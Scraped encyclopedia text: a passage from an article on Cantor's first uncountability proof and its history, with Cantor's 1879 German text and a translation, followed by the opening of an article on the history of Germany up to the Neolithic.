Let[p,q]{\displaystyle [p,q]}be an interval such that no term of sequence (1) lies in it. For example, letp{\displaystyle p}andq{\displaystyle q}satisfyω11<p<q<ω12.{\displaystyle \omega _{1}^{1}<p<q<\omega _{1}^{2}.}Thenω11<p<q<ω1n{\displaystyle \omega _{1}^{1}<p<q<\omega _{1}^{n}}forn≥2,{\displaystyle n\geq 2,}so no term of sequence (1) lies in[p,q].{\displaystyle [p,q].}[22]
Now consider whether the terms of the other sequences lie outside[p,q].{\displaystyle [p,q].}All terms of some of these sequences may lie outside of[p,q];{\displaystyle [p,q];}however, there must be some sequence such that not all its terms lie outside[p,q].{\displaystyle [p,q].}Otherwise, the numbers in[p,q]{\displaystyle [p,q]}would not be contained in sequence(I),{\displaystyle (\mathrm {I} ),}contrary to the initial hypothesis. Let sequence(k){\displaystyle (k)}be the first sequence that contains a term in[p,q]{\displaystyle [p,q]}and letωkn{\displaystyle \omega _{k}^{n}}be the first term. Sincep<ωkn<q,{\displaystyle p<\omega _{k}^{n}<q,}letp1{\displaystyle p_{1}}andq1{\displaystyle q_{1}}satisfyp<p1<q1<ωkn<q.{\displaystyle p<p_{1}<q_{1}<\omega _{k}^{n}<q.}Then[p,q]{\displaystyle [p,q]}is aproper supersetof[p1,q1]{\displaystyle [p_{1},q_{1}]}(in symbols,[p,q]⊋[p1,q1]{\displaystyle [p,q]\supsetneq [p_{1},q_{1}]}). Also, the terms of sequences(1),(2),…,(k−1){\displaystyle (1),(2),\ldots ,(k-1)}lie outside of[p1,q1].{\displaystyle [p_{1},q_{1}].}[22]
Repeat the above argument starting with[p1,q1]:{\displaystyle [p_{1},q_{1}]\!:\,}Let sequence(k1){\displaystyle (k_{1})}be the first sequence containing a term in[p1,q1]{\displaystyle [p_{1},q_{1}]}and letωk1n{\displaystyle \omega _{k_{1}}^{n}}be the first term. Sincep1<ωk1n<q1,{\displaystyle \ p_{1}<\omega _{k_{1}}^{n}<q_{1},}letp2{\displaystyle p_{2}}andq2{\displaystyle q_{2}}satisfyp1<p2<q2<ωk1n<q1.{\displaystyle p_{1}<p_{2}<q_{2}<\omega _{k_{1}}^{n}<q_{1}.}Then[p1,q1]⊋[p2,q2]{\displaystyle [p_{1},q_{1}]\supsetneq [p_{2},q_{2}]}and the terms of sequences(k1),…,(k2−1){\displaystyle (k_{1}),\ldots ,(k_{2}-1)}lie outside of[p2,q2].{\displaystyle [p_{2},q_{2}].}[22]
One sees that it is possible to form an infinite sequence of nested intervals[p,q]⊋[p1,q1]⊋[p2,q2]⊋…{\displaystyle [p,q]\supsetneq [p_{1},q_{1}]\supsetneq [p_{2},q_{2}]\supsetneq \ldots }such that:the members of the1st,2nd,…,(k−1)st{\displaystyle 1^{\text{st}},2^{\text{nd}},\ldots ,(k-1)^{\text{st}}}sequence lie outside[p,q];{\displaystyle [p,q];}the members of thekth,…,(k1−1)st{\displaystyle k^{\text{th}},\ldots ,(k_{1}-1)^{\text{st}}}sequence lie outside[p1,q1];{\displaystyle [p_{1},q_{1}];}the members of the(k1)th,…,(k2−1)st{\displaystyle (k_{1})^{\text{th}},\ldots ,(k_{2}-1)^{\text{st}}}sequence lie outside[p2,q2];{\displaystyle [p_{2},q_{2}];}…;{\displaystyle \ldots ;}[22]
Sincepn{\displaystyle p_{n}}andqn{\displaystyle q_{n}}areboundedmonotonic sequences, the limitslimn→∞pn{\displaystyle \lim _{n\to \infty }p_{n}}andlimn→∞qn{\displaystyle \lim _{n\to \infty }q_{n}}exist. Also,pn<qn{\displaystyle p_{n}<q_{n}}for alln{\displaystyle n}implieslimn→∞pn≤limn→∞qn.{\displaystyle \lim _{n\to \infty }p_{n}\leq \lim _{n\to \infty }q_{n}.}Hence, there is at least one numberη{\displaystyle \eta }in(0,1){\displaystyle (0,1)}that lies in all the intervals[p,q]{\displaystyle [p,q]}and[pn,qn].{\displaystyle [p_{n},q_{n}].}Namely,η{\displaystyle \eta }can be any number in[limn→∞pn,limn→∞qn].{\displaystyle [\lim _{n\to \infty }p_{n},\lim _{n\to \infty }q_{n}].}This implies thatη{\displaystyle \eta }lies outside all the sequences(1),(2),(3),…,{\displaystyle (1),(2),(3),\ldots ,}contradicting the initial hypothesis that sequence(I){\displaystyle (\mathrm {I} )}contains all the real numbers in[0,1].{\displaystyle [0,1].}Therefore, the set of all real numbers is uncountable.[22]
Dedekind received Cantor's proof on December 8. On that same day, Dedekind simplified the proof and mailed his proof to Cantor. Cantor used Dedekind's proof in his article.[25]The letter containing Cantor's December 7 proof was not published until 1937.[26]
On December 9, Cantor announced the theorem that allowed him to construct transcendental numbers as well as prove the uncountability of the set of real numbers:
I show directly that if I start with a sequence
(1)ω1,ω2, ... ,ωn, ...
I can determine, ineverygiven interval [α,β], a numberηthat is not included in (1).[27]
This is the second theorem in Cantor's article. It comes from realizing that his construction can be applied to any sequence, not just to sequences that supposedly enumerate the real numbers. So Cantor had a choice between two proofs that demonstrate the existence of transcendental numbers: one proof is constructive, but the other is not. These two proofs can be compared by starting with a sequence consisting of all the real algebraic numbers.
The constructive proof applies Cantor's construction to this sequence and the interval [a,b] to produce a transcendental number in this interval.[5]
The non-constructive proof uses two proofs by contradiction:
Cantor chose to publish the constructive proof, which not only produces a transcendental number but is also shorter and avoids two proofs by contradiction. The non-constructive proof from Cantor's correspondence is simpler than the one above because it works with all the real numbers rather than the interval [a,b]. This eliminates the subsequence step and all occurrences of [a,b] in the second proof by contradiction.[5]
Akihiro Kanamori, who specializes in set theory, stated that "Accounts of Cantor's work have mostly reversed the order for deducing the existence of transcendental numbers, establishing first the uncountability of the reals and only then drawing the existence conclusion from the countability of the algebraic numbers. In textbooks the inversion may be inevitable, but this has promoted the misconception that Cantor's arguments are non-constructive."[29]
Cantor's published proof and the reverse-order proof both use the theorem: Given a sequence of reals, a real can be found that is not in the sequence. By applying this theorem to the sequence of real algebraic numbers, Cantor produced a transcendental number. He then proved that the reals are uncountable: Assume that there is a sequence containing all the reals. Applying the theorem to this sequence produces a real not in the sequence, contradicting the assumption that the sequence contains all the reals. Hence, the reals are uncountable.[5]The reverse-order proof starts by first proving the reals are uncountable. It then proves that transcendental numbers exist: If there were no transcendental numbers, all the reals would be algebraic and hence countable, which contradicts what was just proved. This contradiction proves that transcendental numbers exist without constructing any.[29]
The correspondence containing Cantor's non-constructive reasoning was published in 1937. By then, other mathematicians had rediscovered his non-constructive, reverse-order proof. As early as 1921, this proof was called "Cantor's proof" and criticized for not producing any transcendental numbers.[30]In that year,Oskar Perrongave the reverse-order proof and then stated: "... Cantor's proof for the existence of transcendental numbers has, along with its simplicity and elegance, the great disadvantage that it is only an existence proof; it does not enable us to actually specify even a single transcendental number."[31][I]
As early as 1930, some mathematicians have attempted to correct this misconception of Cantor's work. In that year, the set theoristAbraham Fraenkelstated that Cantor's method is "... a method that incidentally, contrary to a widespread interpretation, is fundamentally constructive and not merely existential."[32]In 1972,Irving Kaplanskywrote: "It is often said that Cantor's proof is not 'constructive,' and so does not yield a tangible transcendental number. This remark is not justified. If we set up a definite listing of all algebraic numbers ... and then apply thediagonal procedure..., we get a perfectly definite transcendental number (it could be computed to any number of decimal places)."[33][J]Cantor's proof is not only constructive, it is also simpler than Perron's proof, which requires the detour of first proving that the set of all reals is uncountable.[34]
Cantor's diagonal argument has often replaced his 1874 construction in expositions of his proof. The diagonal argument is constructive and produces a more efficient computer program than his 1874 construction. Using it, a computer program has been written that computes the digits of a transcendental number inpolynomial time. The program that uses Cantor's 1874 construction requires at leastsub-exponential time.[35][K]
The presentation of the non-constructive proof without mentioning Cantor's constructive proof appears in some books that were quite successful as measured by the length of time new editions or reprints appeared—for example: Oskar Perron's Irrationalzahlen (1921; 1960, 4th edition),Eric Temple Bell'sMen of Mathematics(1937; still being reprinted),Godfrey HardyandE. M. Wright'sAn Introduction to theTheory of Numbers(1938; 2008 6th edition),Garrett BirkhoffandSaunders Mac Lane'sA Survey ofModern Algebra(1941; 1997 5th edition), andMichael Spivak'sCalculus(1967; 2008 4th edition).[36][L]Since 2014, at least two books have appeared stating that Cantor's proof is constructive,[37]and at least four have appeared stating that his proof does not construct any (or a single) transcendental.[38]
Asserting that Cantor gave a non-constructive argument without mentioning the constructive proof he published can lead to erroneous statements about thehistory of mathematics. InA Survey of Modern Algebra,Birkhoff and Mac Lane state: "Cantor's argument for this result [Not every real number is algebraic] was at first rejected by many mathematicians, since it did not exhibit any specific transcendental number."[39]The proof that Cantor published produces transcendental numbers, and there appears to be no evidence that his argument was rejected. EvenLeopold Kronecker, who had strict views on what is acceptable in mathematics and who could have delayed publication of Cantor's article, did not delay it.[4]In fact, applying Cantor's construction to the sequence of real algebraic numbers produces a limiting process that Kronecker accepted—namely, it determines a number to any required degree of accuracy.[M]
Historians of mathematics have discovered the following facts about Cantor's article "On a Property of the Collection of All Real Algebraic Numbers":
To explain these facts, historians have pointed to the influence of Cantor's former professors,Karl Weierstrassand Leopold Kronecker. Cantor discussed his results with Weierstrass on December 23, 1873.[46]Weierstrass was first amazed by the concept of countability, but then found the countability of the set of real algebraic numbers useful.[47]Cantor did not want to publish yet, but Weierstrass felt that he must publish at least his results concerning the algebraic numbers.[46]
From his correspondence, it appears that Cantor only discussed his article with Weierstrass. However, Cantor told Dedekind: "The restriction which I have imposed on the published version of my investigations is caused in part by local circumstances ..."[46]Cantor biographerJoseph Daubenbelieves that "local circumstances" refers to Kronecker who, as a member of the editorial board ofCrelle's Journal, had delayed publication of an 1870 article byEduard Heine, one of Cantor's colleagues. Cantor would submit his article toCrelle's Journal.[48]
Weierstrass advised Cantor to leave his uncountability theorem out of the article he submitted, but Weierstrass also told Cantor that he could add it as a marginal note during proofreading, which he did.[43]It appears in aremark at the end of the article's introduction. The opinions of Kronecker and Weierstrass both played a role here. Kronecker did not accept infinite sets, and it seems that Weierstrass did not accept that two infinite sets could be so different, with one being countable and the other not.[49]Weierstrass changed his opinion later.[50]Without the uncountability theorem, the article needed a title that did not refer to this theorem. Cantor chose "Ueber eine Eigenschaft des Inbegriffes aller reellen algebraischen Zahlen" ("On a Property of the Collection of All Real Algebraic Numbers"), which refers to the countability of the set of real algebraic numbers, the result that Weierstrass found useful.[51]
Kronecker's influence appears in the proof of Cantor's second theorem. Cantor used Dedekind's version of the proof except he left out why the limitsa∞= limn→ ∞anandb∞= limn→ ∞bnexist. Dedekind had used his "principle of continuity" to prove they exist. This principle (which is equivalent to theleast upper bound propertyof the real numbers) comes from Dedekind's construction of the real numbers, a construction Kronecker did not accept.[52]
Cantor restricted his first theorem to the set of real algebraic numbers even though Dedekind had sent him a proof that handled all algebraic numbers.[20]Cantor did this for expository reasons and because of "local circumstances".[53]This restriction simplifies the article because the second theorem works with real sequences. Hence, the construction in the second theorem can be applied directly to the enumeration of the real algebraic numbers to produce "an effective procedure for the calculation of transcendental numbers". This procedure would be acceptable to Weierstrass.[54]
Since 1856, Dedekind had developed theories involving infinitely many infinite sets—for example:ideals, which he used inalgebraic number theory, andDedekind cuts, which he used to construct the real numbers. This work enabled him to understand and contribute to Cantor's work.[55]
Dedekind's first contribution concerns the theorem that the set of real algebraic numbers is countable. Cantor is usually given credit for this theorem, but the mathematical historian José Ferreirós calls it "Dedekind's theorem." Their correspondence reveals what each mathematician contributed to the theorem.[56]
In his letter introducing the concept of countability, Cantor stated without proof that the set of positive rational numbers is countable, as are sets of the form (an1,n2, ...,nν) wheren1,n2, ...,nν, andνare positive integers.[57]Cantor's second result uses anindexed familyof numbers: a set of the form (an1,n2, ...,nν) is the range of a function from theνindices to the set of real numbers. His second result implies his first: letν= 2 andan1,n2=n1/n2. The function can be quite general—for example,an1,n2,n3,n4,n5=(n1/n2)1/n3+tan(n4/n5).
Dedekind replied with a proof of the theorem that the set of all algebraic numbers is countable.[20]In his reply to Dedekind, Cantor did not claim to have proved Dedekind's result. He did indicate how he proved his theorem about indexed families of numbers: "Your proof that (n) [the set of positive integers] can be correlated one-to-one with the field of all algebraic numbers is approximately the same as the way I prove my contention in the last letter. I taken12+n22+ ··· +nν2=N{\displaystyle {\mathfrak {N}}}and order the elements accordingly."[58]However, Cantor's ordering is weaker than Dedekind's and cannot be extended ton{\displaystyle n}-tuples of integers that include zeros.[59]
Dedekind's second contribution is his proof of Cantor's second theorem. Dedekind sent this proof in reply to Cantor's letter that contained the uncountability theorem, whichCantor provedusing infinitely many sequences. Cantor next wrote that he had found a simpler proof that did not use infinitely many sequences.[60]So Cantor had a choice of proofs and chose to publish Dedekind's.[61]
Cantor thanked Dedekind privately for his help: "... your comments (which I value highly) and your manner of putting some of the points were of great assistance to me."[46]However, he did not mention Dedekind's help in his article. In previous articles, he had acknowledged help received from Kronecker, Weierstrass, Heine, andHermann Schwarz. Cantor's failure to mention Dedekind's contributions damaged his relationship with Dedekind. Dedekind stopped replying to his letters and did not resume the correspondence until October 1876.[62][N]
Cantor's article introduced the uncountability theorem and the concept of countability. Both would lead to significant developments in mathematics. The uncountability theorem demonstrated that one-to-one correspondences can be used to analyze infinite sets. In 1878, Cantor used them to define and compare cardinalities. He also constructed one-to-one correspondences to prove that then-dimensional spacesRn(whereRis the set of real numbers) and the set of irrational numbers have the same cardinality asR.[63][O]
In 1883, Cantor extended the positive integers with his infiniteordinals. This extension was necessary for his work on theCantor–Bendixson theorem. Cantor discovered other uses for the ordinals—for example, he used sets of ordinals to produce an infinity of sets having different infinite cardinalities.[65]His work on infinite sets together with Dedekind's set-theoretical work created set theory.[66]
The concept of countability led to countable operations and objects that are used in various areas of mathematics. For example, in 1878, Cantor introduced countableunionsof sets.[67]In the 1890s,Émile Borelused countable unions in histheory of measure, andRené Baireused countable ordinals to define hisclasses of functions.[68]Building on the work of Borel and Baire,Henri Lebesguecreated his theories ofmeasureandintegration, which were published from 1899 to 1901.[69]
Countablemodelsare used in set theory. In 1922,Thoralf Skolemproved that if conventionalaxioms of set theoryareconsistent, then they have a countable model. Since this model is countable, its set of real numbers is countable. This consequence is calledSkolem's paradox, and Skolem explained why it does not contradict Cantor's uncountability theorem: although there is a one-to-one correspondence between this set and the set of positive integers, no such one-to-one correspondence is a member of the model. Thus the model considers its set of real numbers to be uncountable, or more precisely, thefirst-order sentencethat says the set of real numbers is uncountable is true within the model.[70]In 1963,Paul Cohenused countable models to prove hisindependencetheorems.[71]
. . . But this contradicts a very general theorem, which we have
proved with full rigor in Borchardt's Journal, Vol. 77, page 260; namely, the following theorem:"If one has a simply [countably] infinite sequenceω1, ω2, . . . , ων, . . .of real, unequal numbers that proceed according to some rule, then in every given interval [α, β] a number η (and thus infinitely many of them) can be specified that does not occur in this sequence (as a member of it)."
In view of the great interest in this theorem, not only in the present discussion, but also in many other arithmetical as well as analytical relations, it might not be superfluous if we develop the argument followed there [Cantor's 1874 proof] more clearly here by using simplifying modifications.
Starting with the sequence:ω1, ω2, . . . , ων, . . .(which we give [denote by] the symbol (ω)) and an arbitrary interval [α, β], where α < β, we will now demonstrate that in this interval a real number η can be found that doesnotoccur in (ω).
I. We first notice that if our set (ω) isnot everywhere densein the interval [α, β], then within this interval another interval [γ, δ] must be present, all of whose numbers do not belong to (ω). From the interval [γ, δ], one can then choose any number for η. It lies in the interval [α, β] and definitely doesnotoccur in our sequence (ω). Thus, this case presents no special considerations and we can move on to themore difficultcase.
II. Let the set (ω) beeverywhere densein the interval [α, β]. In this case, every interval [γ,δ] located in [α,β], however small, contains numbers of our sequence (ω). To show that,nevertheless,numbers η in the interval [α, β] exist that do not occur in (ω), we employ the following observation.
Since some numbers in our sequence:ω1, ω2, . . . , ων, . . .
[Seite 5]. . . Dem widerspricht aber ein sehr allgemeiner Satz, welchen wir in Borchardt's Journal, Bd. 77, pag. 260, mit aller Strenge bewiesen haben, nämlich der folgende Satz:
"Hat man eine einfach unendliche Reiheω1, ω2, . . . , ων, . . .von reellen, ungleichen Zahlen, die nach irgend einem Gesetz fortschreiten, so lässt sich in jedem vorgegebenen, Intervalle (α . . . β) eine Zahl η (und folglich lassen sich deren unendlich viele) angeben, welche nicht in jener Reihe (als Glied derselben) vorkommt."
In Anbetracht des grossen Interesses, welches sich an diesen Satz, nicht blos bei der gegenwärtigen Erörterung, sondern auch in vielen anderen sowohl arithmetischen, wie analytischen Beziehungen, knüpft, dürfte es nicht überflüssig sein, wenn wir die dort befolgte Beweisführung [Cantors 1874 Beweis], unter Anwendung vereinfachender Modificationen, hier deutlicher entwickeln.
Unter Zugrundelegung der Reihe:ω1, ω2, . . . , ων, . . .(welcher wir das Zeichen (ω) beilegen) und eines beliebigen Intervalles (α . . . β), wo α < β ist, soll also nun gezeigt werden, dass in diesem Intervalle eine reelle Zahl η gefunden werden kann, welche in (ω)nichtvorkommt.
I. Wir bemerken zunächst, dass wenn unsre Mannichfaltigkeit (ω) in dem Intervall (α . . . β)nicht überall-dichtist, innerhalb dieses Intervalles ein anderes (γ . . . δ) vorhanden sein muss, dessen Zahlen sämmtlich nicht zu (ω) gehören; man kann alsdann für η irgend eine Zahl des Intervalls (γ . . . δ) wählen, sie liegt im Intervalle (α . . . β) und kommt sicher in unsrer Reihe (ω)nichtvor. Dieser Fall bietet daher keinerlei besondere Umstände; und wir können zu demschwierigerenübergehen.
II. Die Mannichfaltigkeit (ω) sei im Intervalle (α . . . β)überall-dicht. In diesem Falle enthält jedes, noch so kleine in (α . . . β) gelegene Intervall (γ . . . δ) Zahlen unserer Reihe (ω). Um zu zeigen, dassnichtsdestowenigerZahlen η im Intervalle (α . . . β) existiren, welche in (ω) nicht vorkommen, stellen wir die folgende Betrachtung an.
Da in unserer Reihe:ω1, ω2, . . . , ων, . . .
definitely occurwithinthe interval [α, β], one of these numbers must have theleast index,let it be ωκ1, and another: ωκ2with the next larger index.
Let the smaller of the two numbers ωκ1, ωκ2be denoted by α', the larger by β'. (Their equality is impossible because we assumed that our sequence consists of nothing but unequal numbers.)
Then according to the definition:α < α' < β' < β,furthermore:κ1< κ2;and all numbers ωμof our sequence,
for which μ ≤ κ2, donotlie in the interior of the interval [α', β'], as is immediately clear from the definition of the numbers κ1, κ2. Similarly, let ωκ3and ωκ4be the two numbers of our sequence with smallest indices that fall in theinteriorof the interval [α', β'] and let the smaller of the numbers ωκ3, ωκ4be denoted by α'', the larger by β''.
Then one has:α' < α'' < β'' < β',κ2< κ3< κ4;and one sees that all numbers ωμof our sequence, for which μ ≤ κ4, donotfall into theinteriorof the interval [α'', β''].
After one has followed this rule to reach an interval[α(ν - 1), β(ν - 1)], the next interval is produced by selecting the first two (i. e. with lowest indices) numbers of our sequence (ω) (let them beωκ2ν - 1and ωκ2ν) that fall into theinteriorof[α(ν - 1), β(ν - 1)]. Let the smaller of these two numbers be denoted by α(ν), the larger by β(ν).
The interval [α(ν), β(ν)] then lies in theinteriorof all preceding intervals and has thespecificrelation with our sequence (ω) that all numbers ωμ, for which μ ≤ κ2ν,definitely do not lie in its interior. Since obviously:κ1< κ2< κ3< . . . , ωκ2ν – 2< ωκ2ν – 1< ωκ2ν, . . .and these numbers, as indices, arewholenumbers, so:κ2ν≥ 2ν,and hence:ν < κ2ν;thus, we can certainly say (and this is sufficient for the following):
That if ν is an arbitrary whole number, the [real] quantity ωνlies outside the interval [α(ν). . . β(ν)].
[Seite 6]sicher Zahleninnerhalbdes Intervalls (α . . . β) vorkommen, so muss eine von diesen Zahlen denkleinsten Indexhaben, sie sei ωκ1, und eine andere: ωκ2mit dem nächst grösseren Index behaftet sein.
Die kleinere der beiden Zahlen ωκ1, ωκ2werde mit α', die grössere mit β' bezeichnet. (Ihre Gleichheit ist ausgeschlossen, weil wir voraussetzten, dass unsere Reihe aus lauter ungleichen Zahlen besteht.)
Es ist alsdann der Definition nach:α < α' < β' < β,ferner:κ1< κ2;und ausserdem ist zu bemerken, dass alle Zahlen ωμunserer Reihe, für welche μ ≤ κ2,nichtim Innern des Intervalls (α' . . . β') liegen, wie aus der Bestimmung der Zahlen κ1, κ2sofort erhellt. Ganz ebenso mögen ωκ3, ωκ4die beiden mit den kleinsten Indices versehenen Zahlen unserer Reihen [see note 1 below] sein, welche in dasInneredes Intervalls (α' . . . β') fallen und die kleinere der Zahlen ωκ3, ωκ4werde mit α'', die grössere mit β'' bezeichnet.
Man hat alsdann:α' < α'' < β'' < β',κ2< κ3< κ4;und man erkennt, dass alle Zahlen ωμunserer Reihe, für welche μ ≤ κ4nichtin dasInneredes Intervalls (α'' . . . β'') fallen.
Nachdem man unter Befolgung des gleichen Gesetzes zu einem Intervall(α(ν - 1), . . . β(ν - 1))gelangt ist, ergiebt sich das folgende Intervall dadurch aus demselben, dass man die beiden ersten (d. h. mit niedrigsten Indices versehenen) Zahlen unserer Reihe (ω) aufstellt (sie seien ωκ2ν – 1und ωκ2ν), welche in dasInnerevon(α(ν – 1). . . β(ν – 1))fallen; die kleinere dieser beiden Zahlen werde mit α(ν), die grössere mit β(ν)bezeichnet.
Das Intervall (α(ν). . . β(ν)) liegt alsdann imInnernaller vorangegangenen Intervalle und hat zu unserer Reihe (ω) dieeigenthümlicheBeziehung, dass alle Zahlen ωμ, für welche μ ≤ κ2νsicher nicht in seinem Innernliegen. Da offenbar:κ1< κ2< κ3< . . . , ωκ2ν – 2< ωκ2ν – 1< ωκ2ν, . . .
und diese Zahlen, als Indices,ganzeZahlen sind, so ist:κ2ν≥ 2ν,und daher:ν < κ2ν;wir können daher, und dies ist für das Folgende ausreichend, gewiss sagen:
Dass, wenn ν eine beliebige ganze Zahl ist, die Grösse ωνausserhalb des Intervalls (α(ν). . . β(ν)) liegt.
Since the numbers α', α'', α''', . . ., α(ν), . . . are continually increasing by value while simultaneously being enclosed in the interval [α, β], they have, by a well-known fundamental theorem of the theory of magnitudes [see note 2 below], a limit that we denote by A, so that:A = Lim α(ν)for ν = ∞.
The same applies to the numbers β', β'', β''', . . ., β(ν), . . ., which are continually decreasing and likewise lying in the interval [α, β]. We call their limit B, so that:B = Lim β(ν)for ν = ∞.
Obviously, one has:α(ν)< A ≤ B < β(ν).
But it is easy to see that the case A < B cannotoccur here since otherwise every number ωνof our sequence would lieoutsideof the interval [A, B] by lying outside the interval [α(ν), β(ν)]. So our sequence (ω) wouldnotbeeverywhere densein the interval [α, β], contrary
to the assumption.
Thus, there only remains the case A = B and now it is demonstrated that the number:η = A = Bdoesnotoccur in our sequence (ω).
If it were a member of our sequence, such as the νth, then one would have: η = ων.
But the latter equation is not possible for any value of ν because η is in theinteriorof the interval [α(ν), β(ν)], but ωνliesoutsideof it.
[Seite 7]Da die Zahlen α', α'', α''', . . ., α(ν), . . . ihrer Grösse nach fortwährend wachsen, dabei jedoch im Intervalle (α . . . β) eingeschlossen sind, so haben sie, nach einem bekannten Fundamentalsatze der Grössenlehre, eine Grenze, die wir mit A bezeichnen, so dass:A = Lim α(ν)für ν = ∞.
Ein Gleiches gilt für die Zahlen β', β'', β''', . . ., β(ν), . . . welche fortwährend abnehmen und dabei ebenfalls im Intervalle (α . . . β) liegen; wir nennen ihre Grenze B, so dass:B = Lim β(ν)für ν = ∞.
Man hat offenbar:α(ν)< A ≤ B < β(ν).
Es ist aber leicht zu sehen, dass der Fall A < B hiernichtvorkommen kann; da sonst jede Zahl ων, unserer Reiheausserhalbdes Intervalles (A . . . B) liegen würde, indem ων, ausserhalb des Intervalls (α(ν). . . β(ν)) gelegen ist; unsere Reihe (ω) wäre im Intervall (α . . . β)nicht überalldicht,gegen die Voraussetzung.
Es bleibt daher nur der Fall A = B übrig und es zeigt sich nun, dass die Zahl:η = A = Bin unserer Reihe (ω)nichtvorkommt.
Denn, würde sie ein Glied unserer Reihe sein, etwa das νte, so hätte man: η = ων.
Die letztere Gleichung ist aber für keinen Werth von v möglich, weil η imInnerndes Intervalls [α(ν), β(ν)], ωνaberausserhalbdesselben liegt.
Note 2:Grössenlehre, which has been translated as "the theory of magnitudes", is a term used by 19th century German mathematicians that refers to the theory ofdiscreteandcontinuousmagnitudes. (Ferreirós 2007, pp. 41–42, 202.)
|
https://en.wikipedia.org/wiki/Cantor%27s_first_uncountability_proof
|
The concept ofGermanyas a distinct region inCentral Europecan be traced toJulius Caesar, who referred to the unconquered area east of theRhineasGermania, thus distinguishing it fromGaul. The victory of theGermanic tribesin theBattle of the Teutoburg Forest(AD9) prevented annexation by theRoman Empire, although theRoman provincesofGermania SuperiorandGermania Inferiorwere established along theRhine. Following theFall of the Western Roman Empire, theFranksconquered the otherWestGermanic tribes. When theFrankish Empirewas divided amongCharles the Great's heirs in 843, the eastern part becameEast Francia, and laterKingdom of Germany. In 962,Otto Ibecame the firstHoly Roman Emperorof theHoly Roman Empire, the medieval German state.
During theHigh Middle Ages, theHanseatic League, dominated by German port cities, established itself along theBalticandNorth Seas. The growth of a crusading element within GermanChristendomled to theState of the Teutonic Orderalong the Baltic coast in what would later becomePrussia. In theInvestiture Controversy, the German Emperors resisted Catholic Church authority. In theLate Middle Ages, the regional dukes, princes, and bishops gained power at the expense of the emperors.Martin Lutherled the ProtestantReformationwithin the Catholic Church after 1517, as the northern and eastern states became Protestant, while most of the southern and western states remained Catholic. TheThirty Years' War, a civil war from 1618 to 1648 brought tremendous destruction to the Holy Roman Empire. The estates of the empire attained great autonomy in thePeace of Westphalia, the most important beingAustria,Prussia,BavariaandSaxony. With theNapoleonic Wars,feudalismfell away and the Holy Roman Empire was dissolved in 1806.Napoleonestablished theConfederation of the Rhineas a German puppet state, but after the French defeat, theGerman Confederationwas established under Austrian presidency. TheGerman revolutions of 1848–1849failed but theIndustrial Revolutionmodernized the German economy, leading to rapid urban growth and the emergence of thesocialist movement. Prussia, with its capitalBerlin, grew in power. German universities became world-class centers for science and humanities, while music and art flourished. Theunification of Germanywas achieved under the leadership of the ChancellorOtto von Bismarckwith the formation of theGerman Empirein 1871. The newReichstag, an elected parliament, had only a limited role in the imperial government. Germany joined the other powers incolonial expansion in Africa and the Pacific.
By 1900, Germany was the dominant power on the European continent and its rapidly expanding industry had surpassed Britain's while provoking it ina naval arms race. Germany led theCentral PowersinWorld War I, but was defeated, partly occupied, forced to paywar reparations, and stripped of its colonies and significant territory along its borders. TheGerman Revolution of 1918–1919ended the German Empire with the abdication ofWilhelm IIin 1918 and established theWeimar Republic, an ultimately unstable parliamentary democracy. In January 1933,Adolf Hitler, leader of theNazi Party, used the economic hardships of theGreat Depressionalong with popular resentment over the terms imposed on Germany at the end of World War I to establish atotalitarianregime. ThisNazi Germanymade racism, especiallyantisemitism, a central tenet of its policies, and became increasingly aggressive with its territorial demands, threatening war if they were not met. Germany quickly remilitarized, annexed its German-speaking neighbors andinvaded Poland, triggeringWorld War II. During the war, the Nazis established a systematicgenocideprogram known asthe Holocaustwhich killed 11 million people, including 6 million Jews (representing 2/3rds of the European Jewish population). By 1944, the German Army was pushed back on all fronts until finally collapsing in May 1945. Underoccupation by the Allies,denazificationefforts took place, large populations under former German-occupied territories were displaced, German territories were split up by the victorious powers and in the east annexed by Poland and the Soviet Union. Germany spent the entirety of theCold Warera divided into theNATO-alignedWest GermanyandWarsaw Pact-alignedEast Germany. Germans also fled from Communist areas into West Germany, which experienced rapideconomic expansion, and became the dominant economy in Western Europe.
In 1989, theBerlin Wallwasopened, theEastern Bloccollapsed, andEast and West Germany were reunitedin 1990. TheFranco-German friendshipbecame the basis for the political integration of Western Europe in theEuropean Union. In 1998–1999, Germany was one of the founding countries of theeurozone. Germany remains one of the economic powerhouses of Europe, contributing about 1/4 of the eurozone's annualgross domestic product. In the early 2010s, Germany played a critical role in trying to resolve the escalating euro crisis, especially concerning Greece and otherSouthern Europeannations. In 2015, Germany faced theEuropean migrant crisisas the main receiver of asylum seekers fromSyriaand other troubled regions. Germany opposedRussia's 2022 invasion of Ukraineand decided to strengthenits armed forces.
Pre-human apes such asDanuvius guggenmosi, who were present in Germany over 11 million years ago, are theorized to be among the earliest apes to walk on two legs prior to other species and genera such asAustralopithecus.[1]The discovery of theHomo heidelbergensismandible in 1907 affirms archaic human presence in Germany by at least 600,000 years ago,[2]so stone tools were dated as far back as 1.33 million years ago.[3]The oldest complete set of hunting weapons ever found anywhere in the world was excavated from a coal mine inSchöningen,Lower Saxony. Between 1994 and 1998,eight 380,000-year-old wooden javelinsbetween 1.82 and 2.25 m (5.97 and 7.38 ft) in length were eventually unearthed.[4][5]One of the oldest buildings in the world and one of the oldest pieces of art was found inBilzingsleben.[6]
In 1856, the fossilized bones of an extinct human species were salvaged from a limestone grotto in theNeandervalley nearDüsseldorf,North Rhine-Westphalia. The archaic nature of the fossils, now known to be around 40,000 years old, was recognized and the characteristics published in the first-everpaleoanthropologicspecies descriptionin 1858 byHermann Schaaffhausen.[7]The species was namedHomo neanderthalensis,Neanderthalman in 1864.
The oldest traces ofhomo sapiensin Germany were found in the caveIlsenhöhle[de]inRanis, where up to 47,500-year-old remains were discovered, among the oldest in Europe.[8]The remains ofPaleolithicearly modern humanoccupation uncovered and documented in several caves in theSwabian Jurainclude various mammoth ivory sculptures that rank among the oldest uncontested works of art and several flutes, made of bird bone and mammoth ivory that are confirmed to be the oldest musical instruments ever found. The 41,000-year-oldLöwenmensch figurinerepresents the oldest uncontested figurative work of art and the 40,000-year-oldVenus of Hohle Felshas been asserted as the oldest uncontested object of human figurative art ever discovered.[9][10][11][12]These artefacts are attributed to theAurignacianculture.
Between 12,900 and 11,700 years ago, north-central Germany was part of theAhrensburg culture(named forAhrensburg).
The first groups of early farmers different from the indigenous hunter-gatherers to migrate into Europe came from a population in westernAnatoliaat the beginning of theNeolithicperiod between 10,000 and 8,000 years ago.[13]
